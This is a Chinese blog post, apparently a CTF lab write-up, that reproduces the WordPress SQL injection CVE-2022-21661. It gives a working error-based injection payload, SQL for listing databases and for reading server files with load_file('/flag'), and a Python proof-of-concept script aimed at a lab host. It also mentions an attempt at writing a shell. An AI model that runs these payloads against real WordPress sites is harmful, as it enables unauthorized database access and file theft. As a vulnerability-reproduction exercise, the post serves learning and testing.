CVE-2022-21661漏洞复现

最新推荐文章于 2023-08-11 06:45:00 发布
最新推荐文章于 2023-08-11 06:45:00 发布
阅读量1k 收藏 1
点赞数 1
分类专栏: CVE漏洞复现 文章标签: python web安全 mysql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_51674437/article/details/131798733
版权
CVE-2022-21661漏洞复现

运行环境: 春秋运镜
该漏洞是wordpress 5.8.3以下存在sql注入 /wp-admin/admin-ajax.php处存在sql注入

漏洞复现

一开始根据网上使用的payload进行注入发现不行

在这里插入图片描述

后来继续信息搜素,发现需要开启Debug模式后者是添加上传送格式

使用这个payload就可以

action=test&data={"tax_query":{"0":{"field":"term_taxonomy_id","terms":["1)+or+extractvalue(rand(),concat(0x7e, user(),0x7e))#"]}}}

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-242mAisp-1689695467666)(C:\Users\11\AppData\Roaming\Typora\typora-user-images\image-20230717183905352.png)]

#了解到了报错注入的运行方式
or+extractvalue(rand(),concat(0x7e, user(),0x7e))
# 接下来只要进行修改 user() 位置上的函数即可
# 如果用到select 就需要用到() 详细看后面的请求包

已经找到注入点了后续就可以变得很简单的原先

先查看所有的数据库看看是否存在ctf数据库

SELECT SCHEMA_NAME FROM INFORMATION_SCHEMA.SCHEMATA -- 更改下注入的语句发现 回显过多加上limit

SELECT SCHEMA_NAME FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 1,1

在这里插入图片描述

这样用测试器遍历一遍,就可以发现所有的数据库了

发现有

information_schema
cms
mysql
performance_schema
sys

发现没有ctf数据库,一开始以为需要直接登录到后台或者怎么getshell,因为是root权限所以尝试了写shell但是后面发现再使用update更新密码的时候,和直接写文件后是不行的。

然后尝试了这些语句

select load_file('/flag')
mid((select load_file('/flag')),20,32)

但是发现可以读取数据,凭借以往的经验flag会在/flag中,(这一点确实坑如果不提前知道的话,而且平常sql注入的漏洞flag也应该再库里),所以直接读取该文件

select load_file('/flag')
mid((select load_file('/flag')),20,32)
--太长就使用这个一段一段取 原因:报错注入好型只能取32个字符
-- select load_file('/flag')  文件一定要闭合 前面闭合使用了” 导致后面不能使用" 只能使用’
-- 使用" 如 "/etc/passwd" 就不会返回结果

在这里插入图片描述

后续继续就可以得到完整的flag了

代码审计

这次的环境直接把源码给我们了,根据已知的了解我们可以开始进行代码审计。
在这里插入图片描述

找到问题文件 class-wp-tax-query.php,这里是构建一个查询。具体的我也还在理解 可以参考
WordPress SQL 注入漏洞(CVE-2022-21661 分析与复现) - FreeBuf网络安全行业门户

在这里插入图片描述

自己编写的python -poc

用漏洞环境尝试了可以使用,实战还不确定

import requests

url = "http://eci-2ze7dycyugnw92tlgbdk.cloudeci1.ichunqiu.com/"
ext = "/wp-admin/admin-ajax.php"
data = '''action=test&data={"tax_query":{"0":{"field":"term_taxonomy_id","terms":["1)+and+extractvalue(rand(),concat(0x7e,database(),0x7e))#"]}}}'''
headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0",
           "Content-Type": "application/x-www-form-urlencoded"}
url = url.split("/")
url = "/".join(url) + ext
resp = requests.post(url,data=data,headers=headers,verify=False)
print(resp.text)
if resp.text != "0":
    print(url + " is Vulnerable")

返回结果
请添加图片描述

Hxdih
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CVE-2022-21661
Battery的博客
11-23 10万+
2022年1月6日,wordpress发布了5.8.3版本,修复了一处核心代码WP_Query的sql注入漏洞。WP_Query是wordpress定义的一个类,允许开发者编写自定义查询和使用不同的参数展示文章,并可以直接查询wordpress数据库,在核心框架和插件以及主题中广泛使用。源码位置:www.tar。
追洞小组 | 实战CVE-2020-16898漏洞复现
Ms08067安全实验室
02-25 1305
三连一下,一起学安全文章来源|MS08067 WEB攻防知识星球本文作者:M-101(Ms08067实验室追洞小组成员) 漏洞复现分析 认准追洞小组漏洞名称Window...
WordPress 5.8.3 SQL注入漏洞 CVE-2022-21661.pdf
09-27
这是最近爆出来的一个 wordpress 的 SQL 注入漏洞,实际上不是一个可以直接利用的洞,而是wordpress 的一个核心函数 WP_Query 的漏洞,这个函数常被插件使用,因此能造成的危害也挺大,前台后台都有可能
(CVE-2022-21661)WordPress SQL 注入漏洞分析和复现
weixin_50464560的博客
09-07 4844
转载https://www.freebuf.com/articles/web/321297.html。
CVE-2022-21661 WordPress 5.8.2 SQL注入批量脚本
苏落is菜鸡的博客
01-18 3610
CVE-2022-21661 WordPress 5.8.2 SQL注入批量脚本
春秋云镜 CVE-2022-21661
qq_22002773的博客
08-11 609
春秋云镜 CVE-2022-21661
CVE-2020-24616复现
mukami0621的博客
09-07 2773
CVE-2020-24616复现 预警参考链接:https://s.tencent.com/research/bsafe/1102.html 8月底爆出的新漏洞,分析可参考:https://mp.weixin.qq.com/s/IICSnsSgwsjnbImgVP-y5g 参考CVE-2020-8840的复现流程,编写Poc,实现此漏洞复现 1、搭建一个Java项目,新建一个Poc类,下载并导入存在漏洞的包 2、可以直接本地充当服务端,也可使用另一台在同一局域网下的电脑充当服务端,两种方式经实验皆可成功复现
CVE-2022-33891POC Apache Spark 命令注入(CVE-2022-33891)POC
08-10
CVE-2022-33891POC Apache Spark 命令注入(CVE-2022-33891)POC CVE-2022-33891 影响版本 Apache spark version 3.1.1版本 Apache Spark version>= 3.3.0 修复方案 1.建议升级到安全版本,参考官网链接: ...
CVE-2022-22963 复现Demo
04-14
CVE-2022-22963 复现Demo,A Spring MVC or Spring WebFlux application running on JDK 9+ may be vulnerable to remote code execution (RCE) via data binding. The specific exploit requires the application ...
CVE-2022-22296 sql注入
苏落is菜鸡的博客
01-21 711
CVE-2022-22296
CVE-2020-21224)浪潮ClusterEngineV4.0 远程命令执行漏洞复现
ximo的博客
04-14 3570
简介 浪潮 Inspur ClusterEngine是中国浪潮公司的一个应用软件。提供管理集群系统中软硬件提交的作业。 漏洞描述 浪潮服务器群集管理系统存在危险字符未过滤,导致远程命令执行 影响版本 浪潮ClusterEngineV4.0 FOFA title="TSCEV4.0" 复现过程 FOFA搜索: 登录页面: 输入账号密码,进行抓包: 页面不存在验证码,且存在用户名枚举,进行暴力破解: 通过fuzz,发现在用户名或密码任意一处添加 ’ ,会报错: 正常输入: 添加单引号: 添加分号,
CVE-2021-3156)Linux sudo权限提升漏洞 复现
大方子
01-31 9272
漏洞概述 1月26日,Sudo发布安全通告,修复了一个类Unix操作系统在命令参数中转义反斜杠时存在基于堆的缓冲区溢出漏洞。当sudo通过-s或-i命令行选项在shell模式下运行命令时,它将在命令参数中使用反斜杠转义特殊字符。但使用-s或 -i标志运行sudoedit时,实际上并未进行转义,从而可能导致缓冲区溢出。只要存在sudoers文件(通常是 /etc/sudoers),攻击者就可以使用本地普通用户利用sudo获得系统root权限。请受影响的用户尽快采取措施进行防护。 影响范围 # 查看sudo版本
Flink高危漏洞 (CVE-2020-17518/17519) 修复指南
u013289115的博客
01-19 4360
一、背景二、修复方法三、详细步骤1.准备flink源码2.找到修复的commit3.编译打包4.替换jar包四、总结 一、背景 ​ 国家信息安全漏洞库(CNNVD)收到关于Apache Flink安全漏洞(CNNVD-202101-271、CVE-2020-17519)(CNNVD-202101-273、CVE-2020-17518)情况的报送。成功利用漏洞的攻击者,可在未授权的情况下,构造恶意数据执行任意文件读取或文件写入攻击,最终获取服务器敏感性信息或权限。Apache Flink 1.5.1 - .
CVE-2020-14882:weblogic 未授权命令执行漏洞验证及修复
weixin_38896449的博客
12-02 3630
weblogic 未授权命令执行漏洞CVE-2020-148821.漏洞描述2.影响版本3.漏洞检测4.漏洞修复 1.漏洞描述 在Oracle官方发布的2020年10月关键补丁更新公告CPU(Critical Patch Update)中,包含一个存在于Weblogic Console中的高危远程代码执行漏洞CVE-2020-14882。未经身份验证的远程攻击者可能通过构造特殊的 HTTP GET请求,利用该漏洞在受影响的 WebLogic Server 上执行任意代码。 2.影响版本 Oracle Web
[CVE-2022-22965]Spring远程代码执行漏洞复现
sGanYu
04-26 4621
漏洞概述(级别:高危) 续上一次Log4j2后,于2022年03月29日,Spring官方发布了Spring框架远程命令执行漏洞公告(CNVD-2022-23942、CVE-2022-22965) 攻击者可以通过构造恶意请求来利用这些漏洞,从而造成任意代码执行,未经身份验证的攻击者可以使用此漏洞进行远程任意代码执行,该漏洞广泛存在于Spring框架以及衍生的框架中,JDK 9.0及以上版本会受到此漏洞影响 FOFA语法 app="APACHE-Tomcat" || app="vmware-Sprin
cve-2022-26134漏洞复现_实战_Confluence最新rce漏洞
恒安嘉新66的博客
06-11 3412
Confluence最新rce漏洞cve-2022-26134漏洞复现,有时拿下Confluence比拿下域控还有用,本次存在OGNL 注入rce漏洞,这次漏洞范围几乎通杀。
Zabbix SAML SSO 登录绕过漏洞CVE-2022-23131)
热门推荐
江左盟的博客
02-25 1万+
产品简介 Zabbix是一个基于WEB界面的提供分布式系统监视以及网络监视功能的企业级的开源解决方案。zabbix能监视各种网络参数,保证服务器系统的安全运营;并提供灵活的通知机制以让系统管理员快速定位/解决存在的各种问题。zabbix由2部分构成,zabbix server与可选组件zabbix agent。zabbix server可以通过SNMP,zabbix agent,ping,端口监视等方法提供对远程服务器/网络状态的监视,数据收集等功能,它可以运行在Linux,Solaris,HP-UX,AI
cve-2022-41741漏洞复现
最新发布
08-24
根据引用的信息,CVE-2022-41741漏洞是在ngx_http_mp4_module中存在的一个内存损坏和内存泄漏的问题。该漏洞已经在nginx-1.23.2主线版中得到修复。因此,要复现CVE-2022-41741漏洞,首先需要使用受影响的版本(例如nginx-1.23.1及之前的版本),然后使用ngx_http_mp4_module模块进行相关操作,即可复现漏洞。请注意,为了保障系统的安全性,我们强烈建议及时更新至最新版本的NGINX,并避免使用已知存在漏洞的旧版本。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *3* [立即升级 NGINX 以应对漏洞风险](https://blog.csdn.net/m0_58461993/article/details/127432416)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] - *2* [远程执行代码漏洞(CVE-2018-0886)漏洞修复](https://download.csdn.net/download/liuxs1230/88237267)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值